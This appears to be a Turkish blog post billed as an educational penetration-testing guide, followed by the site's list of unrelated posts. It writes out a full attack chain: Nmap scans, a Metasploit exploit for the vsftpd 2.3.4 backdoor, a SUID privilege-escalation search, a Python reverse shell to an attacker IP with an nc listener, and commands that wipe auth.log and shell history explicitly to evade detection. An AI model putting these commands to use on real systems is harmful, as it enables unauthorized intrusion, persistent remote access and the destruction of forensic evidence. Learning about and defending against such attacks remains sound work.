Penetrasyon Testi için Adımlar (Eğitim Amaçlı)

📌 1. Bilgi Toplama (Reconnaissance)

Bu aşamada hedef hakkında bilgi toplanır. Örneğin, Nmap kullanarak bir sistemin açık portlarını tarayalım.

🔹 Nmap ile Açık Port Tarama (Aktif Bilgi Toplama)

bashKopyalaDüzenlenmap -sS -Pn -T4 -p- 192.168.1.1

Bu komut:
SYN taraması yapar
Tüm portları tarar
Açık portları ve servisleri listeler


📌 2. Zafiyet Analizi

Açık portlardan birinde çalışan servislerde zafiyet olup olmadığını kontrol edelim.

🔹 Nmap ile Servis Tespiti ve Zafiyet Tarama

bashKopyalaDüzenlenmap -sV --script=vuln 192.168.1.1

Bu komut, hedef sistemde çalışan servisleri tespit eder ve varsa CVE açıklarını listeler.


📌 3. Exploitation (İstismar)

Hedefte bulunan bir FTP servisini (vsftpd 2.3.4) exploit etmek için Metasploit Framework kullanabiliriz.

🔹 Metasploit ile Exploit Çalıştırma

bashKopyalaDüzenlemsfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
exploit

Bu komut ile arka kapı (backdoor) açılır ve sisteme uzaktan bağlanma imkanı elde edilir.


📌 4. Yetki Yükseltme (Privilege Escalation)

Sisteme bağlandıktan sonra yetki yükseltme işlemi yapabiliriz.

🔹 Linux’ta SUID Biten Dosyaları Bulma (Yetki Yükseltme Öncesi)

bashKopyalaDüzenlefind / -perm -4000 2>/dev/null

Bu komut, SUID biti aktif olan dosyaları listeler. Örneğin, /bin/bash dosyası varsa, root yetkisine sahip olabiliriz.


📌 5. Kalıcı Erişim Sağlama

Yetki yükselttikten sonra kalıcı erişim sağlamak için bir reverse shell açabiliriz.

🔹 Python ile Reverse Shell Bağlantısı

Hedef sisteme şu komutu çalıştırarak saldırganın sistemine bağlantı açabiliriz:

bashKopyalaDüzenlepython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bunun için saldırgan tarafında nc dinleyici açmalıyız:

bashKopyalaDüzenlenc -lvp 4444

Bağlantı sağlandığında hacker, hedef makinede shell elde eder.


📌 6. Logları Silme ve Raporlama

Tespit edilmemek için sistem loglarını temizleme işlemi yapılabilir.

🔹 Linux Log Temizleme

bashKopyalaDüzenleecho "" > /var/log/auth.log
history -c

Bu komut, yetkisiz erişim izlerini kaldırır.


📌 Akış Diyagramı

Pentest sürecinin temel akışını aşağıdaki gibi görselleştirebiliriz:

plaintextKopyalaDüzenle        Başlangıç
            |
            ▼
   📡 Bilgi Toplama
   (Nmap, Recon-ng)
            |
            ▼
 🔍 Zafiyet Tespiti
   (Exploit-DB, CVE)
            |
            ▼
 💣 Exploitation
   (Metasploit, RCE)
            |
            ▼
 🚀 Yetki Yükseltme
   (Privilege Escalation)
            |
            ▼
 🔒 Kalıcı Erişim
   (Reverse Shell)
            |
            ▼
 📊 Raporlama ve Log Temizleme
            |
            ▼
        Bitiş ✅
  • Gönderiler/Makaleler/Tezler

    SULAMA SİSTEMİ TASARIMI

    HAFTANIN 7 GÜNÜ 10 FARKLI PROGRAM 2 AYRI RÖLE ÇIKIŞI SICAKTA YAKMASIN BİTKİLERİ DİYE PROGRAM KUR

    AYRIMLI METAL DEDEKTÖRÜ

    (DEFİNECİLERE ÖZEL TASARIM) PULSE DEDEKTÖR-ALTIN DEDEKTÖRÜ PROGRAMIN İÇİNDE BAĞLANTI ŞEKİLLERİ MEVCUT. FAZLASIYLA DETAYLI. KODU AŞAĞIDA PAYLAŞIYORUM KUR ÇALIŞTIR /* * ============================================================================ * PROFESYONEL METAL DEDEKTORU SISTEMI v2.6 (EKRAN DÜZELTİLMİŞ) *…

    Bir yanıt yazın

    E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

    Neler Kaçırdın?

    SULAMA SİSTEMİ TASARIMI

    • By admin
    • Ocak 31, 2026
    • 78 views
    SULAMA SİSTEMİ TASARIMI

    AYRIMLI METAL DEDEKTÖRÜ

    • By admin
    • Ocak 31, 2026
    • 63 views
    AYRIMLI METAL DEDEKTÖRÜ

    METAL DEDEKTÖRÜ GPS DESTEKLİ WEB SUNUCULU

    • By admin
    • Ocak 31, 2026
    • 84 views
    METAL DEDEKTÖRÜ GPS DESTEKLİ WEB SUNUCULU

    SİBER RAPOR

    • By admin
    • Aralık 14, 2025
    • 184 views
    SİBER RAPOR

    YADGAR: YAPAY ZEKÂ DESTEKLİ GÜMRÜK RİSKİ DEĞERLENDİRME SİSTEMİ

    • By admin
    • Kasım 1, 2025
    • 322 views
    YADGAR: YAPAY ZEKÂ DESTEKLİ GÜMRÜK RİSKİ DEĞERLENDİRME SİSTEMİ

    RİSK YÖNETİMİ UZMANLIĞI

    • By admin
    • Ekim 14, 2025
    • 232 views
    RİSK YÖNETİMİ UZMANLIĞI